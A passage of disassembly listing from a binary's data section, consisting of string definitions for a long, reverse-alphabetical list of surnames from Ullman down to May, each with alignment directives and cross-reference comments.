align 4
aUllman db 'Ullman',0 ; DATA XREF: .data:0042EA78�o
align 10h
aTzamarias db 'Tzamarias',0 ; DATA XREF: .data:0042EA74�o
align 4
aTwells db 'Twells',0 ; DATA XREF: .data:0042EA70�o
align 4
aTuttle db 'Tuttle',0 ; DATA XREF: .data:0042EA6C�o
align 4
aTurek db 'Turek',0 ; DATA XREF: .data:0042EA68�o
align 4
aTurano db 'Turano',0 ; DATA XREF: .data:0042EA64�o
align 4
aTukan db 'Tukan',0 ; DATA XREF: .data:0042EA60�o
align 4
aTudge db 'Tudge',0 ; DATA XREF: .data:0042EA5C�o
align 4
aTuck db 'Tuck',0 ; DATA XREF: .data:0042EA58�o
align 4
aTsukurov db 'Tsukurov',0 ; DATA XREF: .data:0042EA54�o
align 10h
aTsomides db 'Tsomides',0 ; DATA XREF: .data:0042EA50�o
align 4
aTsiatis db 'Tsiatis',0 ; DATA XREF: .data:0042EA4C�o
aTruss db 'Truss',0 ; DATA XREF: .data:0042EA48�o
align 4
aTroy db 'Troy',0 ; DATA XREF: .data:0042EA44�o
align 4
aTroiani db 'Troiani',0 ; DATA XREF: .data:0042EA40�o
aTringali db 'Tringali',0 ; DATA XREF: .data:0042EA3C�o
align 4
aTrewin db 'Trewin',0 ; DATA XREF: .data:0042EA38�o
align 10h
aTrenga db 'Trenga',0 ; DATA XREF: .data:0042EA34�o
align 4
aTraebert db 'Traebert',0 ; DATA XREF: .data:0042EA30�o
align 4
aToye db 'Toye',0 ; DATA XREF: .data:0042EA2C�o
align 4
aTowler db 'Towler',0 ; DATA XREF: .data:0042EA28�o
align 4
aTorske db 'Torske',0 ; DATA XREF: .data:0042EA24�o
align 4
aTorresi db 'Torresi',0 ; DATA XREF: .data:0042EA20�o
aTopulos db 'Topulos',0 ; DATA XREF: .data:0042EA1C�o
aToomer db 'Toomer',0 ; DATA XREF: .data:0042EA18�o
align 4
aTomford db 'Tomford',0 ; DATA XREF: .data:0042EA14�o
aTolman db 'Tolman',0 ; DATA XREF: .data:0042EA10�o
align 4
aTolls db 'Tolls',0 ; DATA XREF: .data:0042EA0C�o
align 4
aTollestrup db 'Tollestrup',0 ; DATA XREF: .data:0042EA08�o
align 4
aTofallis db 'Tofallis',0 ; DATA XREF: .data:0042EA04�o
align 4
aTimmons db 'Timmons',0 ; DATA XREF: .data:0042EA00�o
aTill db 'Till',0 ; DATA XREF: .data:0042E9FC�o
align 4
aTierney db 'Tierney',0 ; DATA XREF: .data:0042E9F8�o
aThroop db 'Throop',0 ; DATA XREF: .data:0042E9F4�o
align 4
aThomsen db 'Thomsen',0 ; DATA XREF: .data:0042E9F0�o
aThisted db 'Thisted',0 ; DATA XREF: .data:0042E9EC�o
aThibault db 'Thibault',0 ; DATA XREF: .data:0042E9E8�o
align 10h
aTheodos db 'Theodos',0 ; DATA XREF: .data:0042E9E4�o
aThavaneswaran db 'Thavaneswaran',0 ; DATA XREF: .data:0042E9E0�o
align 4
aThan db 'Than',0 ; DATA XREF: .data:0042E9DC�o
align 10h
aTerracini db 'Terracini',0 ; DATA XREF: .data:0042E9D8�o
align 4
aTenney db 'Tenney',0 ; DATA XREF: .data:0042E9D4�o
align 4
aTemmer db 'Temmer',0 ; DATA XREF: .data:0042E9D0�o
align 4
aTemes db 'Temes',0 ; DATA XREF: .data:0042E9CC�o
align 4
aTeague db 'Teague',0 ; DATA XREF: .data:0042E9C8�o
align 4
aTcherepnin db 'Tcherepnin',0 ; DATA XREF: .data:0042E9C4�o
align 4
aTawn db 'Tawn',0 ; DATA XREF: .data:0042E9C0�o
align 10h
aTaveras db 'Taveras',0 ; DATA XREF: .data:0042E9BC�o
aTatar db 'Tatar',0 ; DATA XREF: .data:0042E9B8�o
align 10h
aTanowitz db 'Tanowitz',0 ; DATA XREF: .data:0042E9B4�o
align 4
aTandler db 'Tandler',0 ; DATA XREF: .data:0042E9B0�o
aTambiah db 'Tambiah',0 ; DATA XREF: .data:0042E9AC�o
aTalaugon db 'Talaugon',0 ; DATA XREF: .data:0042E9A8�o
align 4
aTai db 'Tai',0 ; DATA XREF: .data:0042E9A4�o
aTagiuri db 'Tagiuri',0 ; DATA XREF: .data:0042E9A0�o
aSwindle db 'Swindle',0 ; DATA XREF: .data:0042E99C�o
aSweetser db 'Sweetser',0 ; DATA XREF: .data:0042E998�o
align 4
aSweeting db 'Sweeting',0 ; DATA XREF: .data:0042E994�o
align 4
aSurdam db 'Surdam',0 ; DATA XREF: .data:0042E990�o
align 4
aSuo db 'Suo',0 ; DATA XREF: .data:0042E98C�o
aSumner db 'Sumner',0 ; DATA XREF: .data:0042E988�o
align 4
aSullivan db 'Sullivan',0 ; DATA XREF: .data:0042E984�o
align 4
aStringer db 'Stringer',0 ; DATA XREF: .data:0042E980�o
align 10h
aStreiff db 'Streiff',0 ; DATA XREF: .data:0042E97C�o
aStrauch db 'Strauch',0 ; DATA XREF: .data:0042E978�o
aStrange db 'Strange',0 ; DATA XREF: .data:0042E974�o
aStott db 'Stott',0 ; DATA XREF: .data:0042E970�o
align 10h
aStorer db 'Storer',0 ; DATA XREF: .data:0042E96C�o
align 4
aStonich db 'Stonich',0 ; DATA XREF: .data:0042E968�o
aStolzenberg db 'Stolzenberg',0 ; DATA XREF: .data:0042E964�o
aStockwell db 'Stockwell',0 ; DATA XREF: .data:0042E960�o
align 4
aStockton db 'Stockton',0 ; DATA XREF: .data:0042E95C�o
align 4
aStock db 'Stock',0 ; DATA XREF: .data:0042E958�o
align 4
aStillwell db 'Stillwell',0 ; DATA XREF: .data:0042E954�o
align 4
aStiepock db 'Stiepock',0 ; DATA XREF: .data:0042E950�o
align 4
aStewartOaten db 'Stewart-Oaten',0 ; DATA XREF: .data:0042E94C�o
align 4
aStepniewska db 'Stepniewska',0 ; DATA XREF: .data:0042E948�o
aStephanian db 'Stephanian',0 ; DATA XREF: .data:0042E944�o
align 4
aSteiner db 'Steiner',0 ; DATA XREF: .data:0042E940�o
aStefani db 'Stefani',0 ; DATA XREF: .data:0042E93C�o
aStatlender db 'Statlender',0 ; DATA XREF: .data:0042E938�o
align 4
aStates db 'States',0 ; DATA XREF: .data:0042E934�o
align 10h
aStassinopolus db 'Stassinopolus',0 ; DATA XREF: .data:0042E930�o
align 10h
aStang db 'Stang',0 ; DATA XREF: .data:0042E92C�o
align 4
aStam db 'Stam',0 ; DATA XREF: .data:0042E928�o
align 10h
aStalvey db 'Stalvey',0 ; DATA XREF: .data:0042E924�o
aStmartin db 'StMartin',0 ; DATA XREF: .data:0042E920�o
align 4
aSpinrad db 'Spinrad',0 ; DATA XREF: .data:0042E91C�o
aSpiliotis db 'Spiliotis',0 ; DATA XREF: .data:0042E918�o
align 4
aSpiegelhalter db 'Spiegelhalter',0 ; DATA XREF: .data:0042E914�o
align 4
aSpicer db 'Spicer',0 ; DATA XREF: .data:0042E910�o
align 10h
aSperber db 'Sperber',0 ; DATA XREF: .data:0042E90C�o
aSpence db 'Spence',0 ; DATA XREF: .data:0042E908�o
align 10h
aSpeizer db 'Speizer',0 ; DATA XREF: .data:0042E904�o
aSpaulding db 'Spaulding',0 ; DATA XREF: .data:0042E900�o
align 4
aSparrow db 'Sparrow',0 ; DATA XREF: .data:0042E8FC�o
aSpanier db 'Spanier',0 ; DATA XREF: .data:0042E8F8�o
aSoultanian db 'Soultanian',0 ; DATA XREF: .data:0042E8F4�o
align 10h
aSoule db 'Soule',0 ; DATA XREF: .data:0042E8F0�o
align 4
aSoukup db 'Soukup',0 ; DATA XREF: .data:0042E8EC�o
align 10h
aSottak db 'Sottak',0 ; DATA XREF: .data:0042E8E8�o
align 4
aSorg db 'Sorg',0 ; DATA XREF: .data:0042E8E4�o
align 10h
aSorabella db 'Sorabella',0 ; DATA XREF: .data:0042E8E0�o
align 4
aSommariva db 'Sommariva',0 ; DATA XREF: .data:0042E8DC�o
align 4
aSomers db 'Somers',0 ; DATA XREF: .data:0042E8D8�o
align 10h
aSolon db 'Solon',0 ; DATA XREF: .data:0042E8D4�o
align 4
aSocolow db 'Socolow',0 ; DATA XREF: .data:0042E8D0�o
aSnodgrass db 'Snodgrass',0 ; DATA XREF: .data:0042E8CC�o
align 4
aSniffen db 'Sniffen',0 ; DATA XREF: .data:0042E8C8�o
aSmilow db 'Smilow',0 ; DATA XREF: .data:0042E8C4�o
align 4
aSlowe db 'Slowe',0 ; DATA XREF: .data:0042E8C0�o
align 4
aSloan db 'Sloan',0 ; DATA XREF: .data:0042E8BC�o
align 4
aSkoda db 'Skoda',0 ; DATA XREF: .data:0042E8B8�o
align 4
aSkerry db 'Skerry',0 ; DATA XREF: .data:0042E8B4�o
align 4
aSkane db 'Skane',0 ; DATA XREF: .data:0042E8B0�o
align 4
aSites db 'Sites',0 ; DATA XREF: .data:0042E8AC�o
align 4
aSirilli db 'Sirilli',0 ; DATA XREF: .data:0042E8A8�o
aSinsabaugh db 'Sinsabaugh',0 ; DATA XREF: .data:0042E8A4�o
align 10h
aSilvetti db 'Silvetti',0 ; DATA XREF: .data:0042E8A0�o
align 4
aSilverman db 'Silverman',0 ; DATA XREF: .data:0042E89C�o
align 4
aSigna db 'Signa',0 ; DATA XREF: .data:0042E898�o
align 10h
aSigini db 'Sigini',0 ; DATA XREF: .data:0042E894�o
align 4
aSigalot db 'Sigalot',0 ; DATA XREF: .data:0042E890�o
aSiesto db 'Siesto',0 ; DATA XREF: .data:0042E88C�o
align 4
aShimon db 'Shimon',0 ; DATA XREF: .data:0042E888�o
align 10h
aShibata db 'Shibata',0 ; DATA XREF: .data:0042E884�o
aShia db 'Shia',0 ; DATA XREF: .data:0042E880�o
align 10h
aShesko db 'Shesko',0 ; DATA XREF: .data:0042E87C�o
align 4
aShepstone db 'Shepstone',0 ; DATA XREF: .data:0042E878�o
align 4
aSheppard db 'Sheppard',0 ; DATA XREF: .data:0042E874�o
align 10h
aShepherd db 'Shepherd',0 ; DATA XREF: .data:0042E870�o
align 4
aSheats db 'Sheats',0 ; DATA XREF: .data:0042E86C�o
align 4
aShea db 'Shea',0 ; DATA XREF: .data:0042E868�o
align 4
aShavelson db 'Shavelson',0 ; DATA XREF: .data:0042E864�o
align 4
aShatrov db 'Shatrov',0 ; DATA XREF: .data:0042E860�o
aShar db 'Shar',0 ; DATA XREF: .data:0042E85C�o
align 4
aShanley db 'Shanley',0 ; DATA XREF: .data:0042E858�o
aShankland db 'Shankland',0 ; DATA XREF: .data:0042E854�o
align 4
aShakis db 'Shakis',0 ; DATA XREF: .data:0042E850�o
align 4
aShaikh db 'Shaikh',0 ; DATA XREF: .data:0042E84C�o
align 4
aSeyfert db 'Seyfert',0 ; DATA XREF: .data:0042E848�o
aSexton db 'Sexton',0 ; DATA XREF: .data:0042E844�o
align 4
aSeterdahl db 'Seterdahl',0 ; DATA XREF: .data:0042E840�o
align 4
aSennett db 'Sennett',0 ; DATA XREF: .data:0042E83C�o
aSen db 'Sen',0 ; DATA XREF: .data:0042E838�o
aSelvage db 'Selvage',0 ; DATA XREF: .data:0042E834�o
aSekler db 'Sekler',0 ; DATA XREF: .data:0042E830�o
align 4
aSegal db 'Segal',0 ; DATA XREF: .data:0042E82C�o
align 4
aSeeber db 'Seeber',0 ; DATA XREF: .data:0042E828�o
align 4
aSeaton db 'Seaton',0 ; DATA XREF: .data:0042E824�o
align 4
aScudder db 'Scudder',0 ; DATA XREF: .data:0042E820�o
aScovel db 'Scovel',0 ; DATA XREF: .data:0042E81C�o
align 4
aSchwickrath db 'Schwickrath',0 ; DATA XREF: .data:0042E818�o
aSchwan db 'Schwan',0 ; DATA XREF: .data:0042E814�o
align 10h
aSchuyler db 'Schuyler',0 ; DATA XREF: .data:0042E810�o
align 4
aSchutte db 'Schutte',0 ; DATA XREF: .data:0042E80C�o
aSchuman db 'Schuman',0 ; DATA XREF: .data:0042E808�o
aSchossberger db 'Schossberger',0 ; DATA XREF: .data:0042E804�o
align 4
aSchmitt db 'Schmitt',0 ; DATA XREF: .data:0042E800�o
aSchilling db 'Schilling',0 ; DATA XREF: .data:0042E7FC�o
align 10h
aSchifini db 'Schifini',0 ; DATA XREF: .data:0042E7F8�o
align 4
aSchiano db 'Schiano',0 ; DATA XREF: .data:0042E7F4�o
aScheiner db 'Scheiner',0 ; DATA XREF: .data:0042E7F0�o
align 10h
aScharlemann db 'Scharlemann',0 ; DATA XREF: .data:0042E7EC�o
aScharf db 'Scharf',0 ; DATA XREF: .data:0042E7E8�o
align 4
aScepan db 'Scepan',0 ; DATA XREF: .data:0042E7E4�o
align 4
aScarponi db 'Scarponi',0 ; DATA XREF: .data:0042E7E0�o
align 4
aSayied db 'Sayied',0 ; DATA XREF: .data:0042E7DC�o
align 10h
aSawtell db 'Sawtell',0 ; DATA XREF: .data:0042E7D8�o
aSatterthwaite db 'Satterthwaite',0 ; DATA XREF: .data:0042E7D4�o
align 4
aSatta db 'Satta',0 ; DATA XREF: .data:0042E7D0�o
align 10h
aSatin db 'Satin',0 ; DATA XREF: .data:0042E7CC�o
align 4
aSase db 'Sase',0 ; DATA XREF: .data:0042E7C8�o
align 10h
aSartore db 'Sartore',0 ; DATA XREF: .data:0042E7C4�o
aSarin db 'Sarin',0 ; DATA XREF: .data:0042E7C0�o
align 10h
aSapers db 'Sapers',0 ; DATA XREF: .data:0042E7BC�o
align 4
aSanna db 'Sanna',0 ; DATA XREF: .data:0042E7B8�o
align 10h
aSanchezRamirez db 'Sanchez-Ramirez',0 ; DATA XREF: .data:0042E7B4�o
aSamson db 'Samson',0 ; DATA XREF: .data:0042E7B0�o
align 4
aSali db 'Sali',0 ; DATA XREF: .data:0042E7AC�o
align 10h
aSahu db 'Sahu',0 ; DATA XREF: .data:0042E7A8�o
align 4
aSafire db 'Safire',0 ; DATA XREF: .data:0042E7A4�o
align 10h
aSadler db 'Sadler',0 ; DATA XREF: .data:0042E7A0�o
align 4
aSabatello db 'Sabatello',0 ; DATA XREF: .data:0042E79C�o
align 4
aRyu db 'Ryu',0 ; DATA XREF: .data:0042E798�o
aRush db 'Rush',0 ; DATA XREF: .data:0042E794�o
align 10h
aRuescher db 'Ruescher',0 ; DATA XREF: .data:0042E790�o
align 4
aRuderman db 'Ruderman',0 ; DATA XREF: .data:0042E78C�o
align 4
aRuan db 'Ruan',0 ; DATA XREF: .data:0042E788�o
align 10h
aRu db 'Ru',0 ; DATA XREF: .data:0042E784�o
align 4
aRoyal db 'Royal',0 ; DATA XREF: .data:0042E780�o
align 4
aRow db 'Row',0 ; DATA XREF: .data:0042E77C�o
aRonen db 'Ronen',0 ; DATA XREF: .data:0042E778�o
align 4
aRogers db 'Rogers',0 ; DATA XREF: .data:0042E774�o
align 10h
aRoesler db 'Roesler',0 ; DATA XREF: .data:0042E770�o
aRocha db 'Rocha',0 ; DATA XREF: .data:0042E76C�o
align 10h
aRobinson db 'Robinson',0 ; DATA XREF: .data:0042E768�o
align 4
aRivera db 'Rivera',0 ; DATA XREF: .data:0042E764�o
align 4
aRish db 'Rish',0 ; DATA XREF: .data:0042E760�o
align 4
aRineer db 'Rineer',0 ; DATA XREF: .data:0042E75C�o
align 4
aRindos db 'Rindos',0 ; DATA XREF: .data:0042E758�o
align 4
aRielly db 'Rielly',0 ; DATA XREF: .data:0042E754�o
align 4
aRichmond db 'Richmond',0 ; DATA XREF: .data:0042E750�o
align 10h
aRhea db 'Rhea',0 ; DATA XREF: .data:0042E74C�o
align 4
aResnik db 'Resnik',0 ; DATA XREF: .data:0042E748�o
align 10h
aRepetto db 'Repetto',0 ; DATA XREF: .data:0042E744�o
aRenick db 'Renick',0 ; DATA XREF: .data:0042E740�o
align 10h
aRemak db 'Remak',0 ; DATA XREF: .data:0042E73C�o
align 4
aReinold db 'Reinold',0 ; DATA XREF: .data:0042E738�o
aCunningham db 'Cunningham',0 ; DATA XREF: .data:0042E734�o
align 4
aReedquist db 'Reedquist',0 ; DATA XREF: .data:0042E730�o
align 4
aReddenTyler db 'Redden-Tyler',0 ; DATA XREF: .data:0042E72C�o
align 4
aRayport db 'Rayport',0 ; DATA XREF: .data:0042E728�o
aRapple db 'Rapple',0 ; DATA XREF: .data:0042E724�o
align 4
aRankin db 'Rankin',0 ; DATA XREF: .data:0042E720�o
align 10h
aRangan db 'Rangan',0 ; DATA XREF: .data:0042E71C�o
align 4
aRaney db 'Raney',0 ; DATA XREF: .data:0042E718�o
align 10h
aRajagopalan db 'Rajagopalan',0 ; DATA XREF: .data:0042E714�o
aRadeke db 'Radeke',0 ; DATA XREF: .data:0042E710�o
align 4
aRabkin db 'Rabkin',0 ; DATA XREF: .data:0042E70C�o
align 4
aRabe db 'Rabe',0 ; DATA XREF: .data:0042E708�o
align 4
aQuetin db 'Quetin',0 ; DATA XREF: .data:0042E704�o
align 4
aQuaday db 'Quaday',0 ; DATA XREF: .data:0042E700�o
align 4
aPynchon db 'Pynchon',0 ; DATA XREF: .data:0042E6FC�o
aPugh db 'Pugh',0 ; DATA XREF: .data:0042E6F8�o
align 4
aPuccia db 'Puccia',0 ; DATA XREF: .data:0042E6F4�o
align 4
aProthrowStith db 'Prothrow-Stith',0 ; DATA XREF: .data:0042E6F0�o
align 4
aProietti db 'Proietti',0 ; DATA XREF: .data:0042E6EC�o
align 4
aPritz db 'Pritz',0 ; DATA XREF: .data:0042E6E8�o
align 10h
aPritchard db 'Pritchard',0 ; DATA XREF: .data:0042E6E4�o
align 4
aPrevost db 'Prevost',0 ; DATA XREF: .data:0042E6E0�o
aPreucel db 'Preucel',0 ; DATA XREF: .data:0042E6DC�o
aPresper db 'Presper',0 ; DATA XREF: .data:0042E6D8�o
aPowers db 'Powers',0 ; DATA XREF: .data:0042E6D4�o
align 4
aPoolman db 'Poolman',0 ; DATA XREF: .data:0042E6D0�o
aPoma db 'Poma',0 ; DATA XREF: .data:0042E6CC�o
align 4
aPolitis db 'Politis',0 ; DATA XREF: .data:0042E6C8�o
aPolanyi db 'Polanyi',0 ; DATA XREF: .data:0042E6C4�o
aPolak db 'Polak',0 ; DATA XREF: .data:0042E6C0�o
align 4
aPoirier db 'Poirier',0 ; DATA XREF: .data:0042E6BC�o
aPointer db 'Pointer',0 ; DATA XREF: .data:0042E6B8�o
aPoincaire db 'Poincaire',0 ; DATA XREF: .data:0042E6B4�o
align 10h
aPocobene db 'Pocobene',0 ; DATA XREF: .data:0042E6B0�o
align 4
aPo db 'Po',0 ; DATA XREF: .data:0042E6AC�o
align 10h
aPlous db 'Plous',0 ; DATA XREF: .data:0042E6A8�o
align 4
aPlasket db 'Plasket',0 ; DATA XREF: .data:0042E6A4�o
aPlant db 'Plant',0 ; DATA XREF: .data:0042E6A0�o
align 4
aPlancon db 'Plancon',0 ; DATA XREF: .data:0042E69C�o
aPinot db 'Pinot',0 ; DATA XREF: .data:0042E698�o
align 4
aPilbeam db 'Pilbeam',0 ; DATA XREF: .data:0042E694�o
aPfister db 'Pfister',0 ; DATA XREF: .data:0042E690�o
aPettit db 'Pettit',0 ; DATA XREF: .data:0042E68C�o
align 10h
aPettibone db 'Pettibone',0 ; DATA XREF: .data:0042E688�o
align 4
aPetruzello db 'Petruzello',0 ; DATA XREF: .data:0042E684�o
align 4
aPeters db 'Peters',0 ; DATA XREF: .data:0042E680�o
align 10h
aPerrimon db 'Perrimon',0 ; DATA XREF: .data:0042E67C�o
align 4
aPerone db 'Perone',0 ; DATA XREF: .data:0042E678�o
align 4
aPerna db 'Perna',0 ; DATA XREF: .data:0042E674�o
align 4
aPerlman db 'Perlman',0 ; DATA XREF: .data:0042E670�o
aPerlak db 'Perlak',0 ; DATA XREF: .data:0042E66C�o
align 4
aPerko db 'Perko',0 ; DATA XREF: .data:0042E668�o
align 4
aPereira db 'Pereira',0 ; DATA XREF: .data:0042E664�o
aPenny db 'Penny',0 ; DATA XREF: .data:0042E660�o
align 4
aPeishel db 'Peishel',0 ; DATA XREF: .data:0042E65C�o
aPederson db 'Pederson',0 ; DATA XREF: .data:0042E658�o
align 4
aPearlberg db 'Pearlberg',0 ; DATA XREF: .data:0042E654�o
align 4
aPeabody db 'Peabody',0 ; DATA XREF: .data:0042E650�o
aPaynter db 'Paynter',0 ; DATA XREF: .data:0042E64C�o
aPawloski db 'Pawloski',0 ; DATA XREF: .data:0042E648�o
align 10h
aPavlon db 'Pavlon',0 ; DATA XREF: .data:0042E644�o
align 4
aPavetti db 'Pavetti',0 ; DATA XREF: .data:0042E640�o
aPattullo db 'Pattullo',0 ; DATA XREF: .data:0042E63C�o
align 4
aPatrick db 'Patrick',0 ; DATA XREF: .data:0042E638�o
aPatefield db 'Patefield',0 ; DATA XREF: .data:0042E634�o
align 10h
aPascucci db 'Pascucci',0 ; DATA XREF: .data:0042E630�o
align 4
aPartridge db 'Partridge',0 ; DATA XREF: .data:0042E62C�o
align 4
aParris db 'Parris',0 ; DATA XREF: .data:0042E628�o
align 10h
aParmeggiani db 'Parmeggiani',0 ; DATA XREF: .data:0042E624�o
aPaoletti db 'Paoletti',0 ; DATA XREF: .data:0042E620�o
align 4
aPantilla db 'Pantilla',0 ; DATA XREF: .data:0042E61C�o
align 4
aPanizzon db 'Panizzon',0 ; DATA XREF: .data:0042E618�o
align 10h
aPanadero db 'Panadero',0 ; DATA XREF: .data:0042E614�o
align 4
aPalmitesta db 'Palmitesta',0 ; DATA XREF: .data:0042E610�o
align 4
aPallara db 'Pallara',0 ; DATA XREF: .data:0042E60C�o
aPalepu db 'Palepu',0 ; DATA XREF: .data:0042E608�o
align 4
aPalayoor db 'Palayoor',0 ; DATA XREF: .data:0042E604�o
align 4
aPaine db 'Paine',0 ; DATA XREF: .data:0042E600�o
align 4
aPaesdealmeida db 'PaesDealmeida',0 ; DATA XREF: .data:0042E5FC�o
align 4
aOvid db 'Ovid',0 ; DATA XREF: .data:0042E5F8�o
align 4
aOuchida db 'Ouchida',0 ; DATA XREF: .data:0042E5F4�o
aOtten db 'Otten',0 ; DATA XREF: .data:0042E5F0�o
align 4
aOttaviani db 'Ottaviani',0 ; DATA XREF: .data:0042E5EC�o
align 10h
aOstrowski db 'Ostrowski',0 ; DATA XREF: .data:0042E5E8�o
align 4
aOspina db 'Ospina',0 ; DATA XREF: .data:0042E5E4�o
align 4
aOrsi db 'Orsi',0 ; DATA XREF: .data:0042E5E0�o
align 4
aOrfield db 'Orfield',0 ; DATA XREF: .data:0042E5DC�o
aOray db 'Oray',0 ; DATA XREF: .data:0042E5D8�o
align 4
aOpel db 'Opel',0 ; DATA XREF: .data:0042E5D4�o
align 4
aOMeara db 'O',27h,'meara',0 ; DATA XREF: .data:0042E5D0�o
aOman db 'Oman',0 ; DATA XREF: .data:0042E5CC�o
align 4
aOMalley db 'O',27h,'malley',0 ; DATA XREF: .data:0042E5C8�o
align 10h
aOlszewski db 'Olszewski',0 ; DATA XREF: .data:0042E5C4�o
align 4
aOlson db 'Olson',0 ; DATA XREF: .data:0042E5C0�o
align 4
aOlsen db 'Olsen',0 ; DATA XREF: .data:0042E5BC�o
align 4
aOldford db 'Oldford',0 ; DATA XREF: .data:0042E5B8�o
aOHagan db 'O',27h,'hagan',0 ; DATA XREF: .data:0042E5B4�o
aOh db 'Oh',0 ; DATA XREF: .data:0042E5B0�o
align 10h
aOgata db 'Ogata',0 ; DATA XREF: .data:0042E5AC�o
align 4
aOcougne db 'Ocougne',0 ; DATA XREF: .data:0042E5A8�o
aNuzum db 'Nuzum',0 ; DATA XREF: .data:0042E5A4�o
align 4
aNotman db 'Notman',0 ; DATA XREF: .data:0042E5A0�o
align 10h
aNitabach db 'Nitabach',0 ; DATA XREF: .data:0042E59C�o
align 4
aNisenson db 'Nisenson',0 ; DATA XREF: .data:0042E598�o
align 4
aNickoloff db 'Nickoloff',0 ; DATA XREF: .data:0042E594�o
align 4
aNickerson db 'Nickerson',0 ; DATA XREF: .data:0042E590�o
align 10h
aNi_0 db 'Ni',0 ; DATA XREF: .data:0042E58C�o
align 4
aNg db 'Ng',0 ; DATA XREF: .data:0042E588�o
align 4
aNewlin db 'Newlin',0 ; DATA XREF: .data:0042E584�o
align 10h
aNewfeld db 'Newfeld',0 ; DATA XREF: .data:0042E580�o
aNeuman db 'Neuman',0 ; DATA XREF: .data:0042E57C�o
align 10h
aNesci db 'Nesci',0 ; DATA XREF: .data:0042E578�o
align 4
aNenna db 'Nenna',0 ; DATA XREF: .data:0042E574�o
align 10h
aNelson db 'Nelson',0 ; DATA XREF: .data:0042E570�o
align 4
aNayduch db 'Nayduch',0 ; DATA XREF: .data:0042E56C�o
aNaviaux db 'Naviaux',0 ; DATA XREF: .data:0042E568�o
aNardone db 'Nardone',0 ; DATA XREF: .data:0042E564�o
aNardi db 'Nardi',0 ; DATA XREF: .data:0042E560�o
align 4
aNapolitano db 'Napolitano',0 ; DATA XREF: .data:0042E55C�o
align 4
aNaddeo db 'Naddeo',0 ; DATA XREF: .data:0042E558�o
align 4
aMussachio db 'Mussachio',0 ; DATA XREF: .data:0042E554�o
align 4
aMumford db 'Mumford',0 ; DATA XREF: .data:0042E550�o
aMulroy db 'Mulroy',0 ; DATA XREF: .data:0042E54C�o
align 4
aMulkern db 'Mulkern',0 ; DATA XREF: .data:0042E548�o
aMugnai db 'Mugnai',0 ; DATA XREF: .data:0042E544�o
align 4
aMuello db 'Muello',0 ; DATA XREF: .data:0042E540�o
align 10h
aMudarri db 'Mudarri',0 ; DATA XREF: .data:0042E53C�o
aMotooka db 'Motooka',0 ; DATA XREF: .data:0042E538�o
aMostafavi db 'Mostafavi',0 ; DATA XREF: .data:0042E534�o
align 4
aMosler db 'Mosler',0 ; DATA XREF: .data:0042E530�o
align 4
aMosher db 'Mosher',0 ; DATA XREF: .data:0042E52C�o
align 4
aMortimer db 'Mortimer',0 ; DATA XREF: .data:0042E528�o
align 4
aMorrow db 'Morrow',0 ; DATA XREF: .data:0042E524�o
align 10h
aMorrison db 'Morrison',0 ; DATA XREF: .data:0042E520�o
align 4
aMoreton db 'Moreton',0 ; DATA XREF: .data:0042E51C�o
aMorani db 'Morani',0 ; DATA XREF: .data:0042E518�o
align 4
aMooredech_ db 'MooreDeCh.',0 ; DATA XREF: .data:0042E514�o
align 4
aMontilio db 'Montilio',0 ; DATA XREF: .data:0042E510�o
align 4
aMonque db 'Monque',0 ; DATA XREF: .data:0042E50C�o
align 4
aMoiamedi db 'Moiamedi',0 ; DATA XREF: .data:0042E508�o
align 4
aMohr db 'Mohr',0 ; DATA XREF: .data:0042E504�o
align 10h
aMoeller db 'Moeller',0 ; DATA XREF: .data:0042E500�o
aModestino db 'Modestino',0 ; DATA XREF: .data:0042E4FC�o
align 4
aMocroft db 'Mocroft',0 ; DATA XREF: .data:0042E4F8�o
aMittal db 'Mittal',0 ; DATA XREF: .data:0042E4F4�o
align 4
aMitropoulos db 'Mitropoulos',0 ; DATA XREF: .data:0042E4F0�o
aGonzalez db 'Gonzalez',0 ; DATA XREF: .data:0042E4EC�o
align 4
aMinichiello db 'Minichiello',0 ; DATA XREF: .data:0042E4E8�o
aMini db 'Mini',0 ; DATA XREF: .data:0042E4E4�o
align 10h
aMinh db 'Minh',0 ; DATA XREF: .data:0042E4E0�o
align 4
aMills db 'Mills',0 ; DATA XREF: .data:0042E4DC�o
align 10h
aMieher db 'Mieher',0 ; DATA XREF: .data:0042E4D8�o
align 4
aMiddle db 'Middle',0 ; DATA XREF: .data:0042E4D4�o
align 10h
aMichelman db 'Michelman',0 ; DATA XREF: .data:0042E4D0�o
align 4
aMeurer db 'Meurer',0 ; DATA XREF: .data:0042E4CC�o
align 4
aMetropolis db 'Metropolis',0 ; DATA XREF: .data:0042E4C8�o
align 10h
aMetelka db 'Metelka',0 ; DATA XREF: .data:0042E4C4�o
aMerz db 'Merz',0 ; DATA XREF: .data:0042E4C0�o
align 10h
aMerseth db 'Merseth',0 ; DATA XREF: .data:0042E4BC�o
aMerminod db 'Merminod',0 ; DATA XREF: .data:0042E4B8�o
align 4
aMerlani db 'Merlani',0 ; DATA XREF: .data:0042E4B4�o
aMerikoski db 'Merikoski',0 ; DATA XREF: .data:0042E4B0�o
align 4
aMenzies db 'Menzies',0 ; DATA XREF: .data:0042E4AC�o
aMemisoglu db 'Memisoglu',0 ; DATA XREF: .data:0042E4A8�o
align 4
aMeccariello db 'Meccariello',0 ; DATA XREF: .data:0042E4A4�o
aMcnulty db 'Mcnulty',0 ; DATA XREF: .data:0042E4A0�o
aMcnealy db 'Mcnealy',0 ; DATA XREF: .data:0042E49C�o
aMclaren db 'Mclaren',0 ; DATA XREF: .data:0042E498�o
aMclane db 'Mclane',0 ; DATA XREF: .data:0042E494�o
align 4
aMckenna db 'Mckenna',0 ; DATA XREF: .data:0042E490�o
aMcintosh db 'Mcintosh',0 ; DATA XREF: .data:0042E48C�o
align 4
aMcilroy db 'McIlroy',0 ; DATA XREF: .data:0042E488�o
aMcgoldrick db 'Mcgoldrick',0 ; DATA XREF: .data:0042E484�o
align 10h
aMcghee db 'Mcghee',0 ; DATA XREF: .data:0042E480�o
align 4
aMcfadden db 'McFadden',0 ; DATA XREF: .data:0042E47C�o
align 4
aMcelroy db 'Mcelroy',0 ; DATA XREF: .data:0042E478�o
aMcdowell db 'Mcdowell',0 ; DATA XREF: .data:0042E474�o
align 4
aMcclearn db 'Mcclearn',0 ; DATA XREF: .data:0042E470�o
align 4
aMccall db 'Mccall',0 ; DATA XREF: .data:0042E46C�o
align 4
aMccaffery db 'Mccaffery',0 ; DATA XREF: .data:0042E468�o
align 4
aMcbride db 'Mcbride',0 ; DATA XREF: .data:0042E464�o
aMazziotta db 'Mazziotta',0 ; DATA XREF: .data:0042E460�o
align 4
aMazzali db 'Mazzali',0 ; DATA XREF: .data:0042E45C�o
aMay db 'May',0 ; DATA XREF: .data:0042E458�o
